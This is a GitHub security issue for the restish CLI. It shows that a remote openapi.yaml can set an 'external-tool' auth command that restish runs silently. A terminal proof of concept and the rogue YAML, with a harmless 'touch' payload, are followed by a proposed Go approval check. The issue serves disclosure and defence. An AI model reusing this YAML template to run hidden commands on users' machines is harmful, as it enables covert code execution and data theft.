Security: rogue openapi.yaml can run commands in the user context #316

@NeuroWinter

The external tool that is part of the auth module can be easily abused to run rogue commands in the user context.
This poses a threat as this is completely hidden from the user. I know the feature itself was designed to make life easier for auth, if a user has scripts that will generate keys, but this is easily abused.

The issue is this line here: https://github.com/rest-sh/restish/blob/main/cli/auth.go#L109

That will run whatever is in the commandLine key under x-cli-config, e.g.:

neuro on Berne in ~ restish --version
restish version dev-2026-02-14-09:27
neuro on Berne in ~ ls ~/ohno.txt
"/home/neuro/ohno.txt": No such file or directory (os error 2)
neuro on Berne in ~ restish api configure testing https://test.armitagesarchive.com/
Found API auto-configuration, setting up default profile...
? Select option Save and exit
neuro on Berne in ~ restish testing get-users
HTTP/2.0 404 Not Found
Alt-Svc: h3=":443"; ma=86400
Cf-Cache-Status: DYNAMIC
Cf-Ray: 9cd713153ac7d9a2-AKL
Content-Encoding: br
Content-Type: text/html
Date: Fri, 13 Feb 2026 20:28:51 GMT
Nel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=9oXJcMWPFqPOavJrit88z3JWUNXS8Eolg3CY6lqt8OkGYBuxLzG7rggIAotvkBzp5IocL8L2jhA%2FtS6nHAn9lRleYgDOaLbm8ntec9BPEzmhExkJdg5Y9zdDZ%2F9cyR4Q1ORQ"}]}
Server: cloudflare
Vary: accept-encoding
X-Clacks-Overhead: GNU Terry Pratchett
X-Varied-Accept-Encoding: deflate, gzip, br

<html>
<head><title>404 Not Found</title></head>
<body>
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.29.5</center>
</body>
</html>
neuro on Berne in ~ ls ~/ohno.txt
/home/neuro/ohno.txt
neuro on Berne in ~ curl https://test.armitagesarchive.com/openapi.yaml
openapi: "3.1.0"
info:
    title: Honnest not bad stuff here at all
x-cli-config:
    security: "external-tool"
    params:
        commandline: "touch ~/ohno.txt"
components:
    securitySchemes:
        external-tool:
            type: apiKey
            in: header
            name: X-Dummy
paths:
    /users:
        get:
            summary: Get users
            responses:
                "200":
                    description: Success

This is a super simple PoC, but it can be used to extract any sort of info from the user's machine.
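
One way to close the gap reported above is to record where a profile's auth settings came from and refuse to run an `external-tool` command taken from a fetched API description until the user has been shown it and approved it. The Go example below is added here and is not restish's code; `AuthConfig`, `Origin`, `CommandToRun` and the approval flag are hypothetical names.

```go
package main

import (
	"errors"
	"fmt"
)

// Origin records where a profile's auth settings came from (hypothetical type).
type Origin int

const (
	OriginUser   Origin = iota // entered locally by the user
	OriginRemote               // copied from x-cli-config in a fetched API description
)

// AuthConfig is a hypothetical model of a stored profile's auth settings.
type AuthConfig struct {
	Security string            // e.g. "external-tool"
	Params   map[string]string // e.g. {"commandline": "..."}
	Origin   Origin
	Approved bool // set only after the user saw the command and agreed
}

var ErrUnapproved = errors.New("external-tool command from remote API description needs user approval")

// CommandToRun returns the command line the auth step may execute, or an
// error when a remote-supplied command has not been approved by the user.
func CommandToRun(c AuthConfig) (string, error) {
	if c.Security != "external-tool" {
		return "", nil // other auth schemes run no local command
	}
	cmd := c.Params["commandline"]
	if cmd == "" {
		return "", errors.New("external-tool: missing commandline")
	}
	if c.Origin == OriginRemote && !c.Approved {
		return "", fmt.Errorf("%w: %q", ErrUnapproved, cmd)
	}
	return cmd, nil
}

func main() {
	// Constructed sample mirroring the PoC document in the issue.
	remote := AuthConfig{Security: "external-tool", Params: map[string]string{"commandline": "touch ~/ohno.txt"}, Origin: OriginRemote}
	_, err := CommandToRun(remote)
	fmt.Println("remote, unapproved:", err)
}
```

The error text includes the quoted command, so the prompt that asks for approval can show the user exactly what would run.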

Labels: bug (Something isn't working)
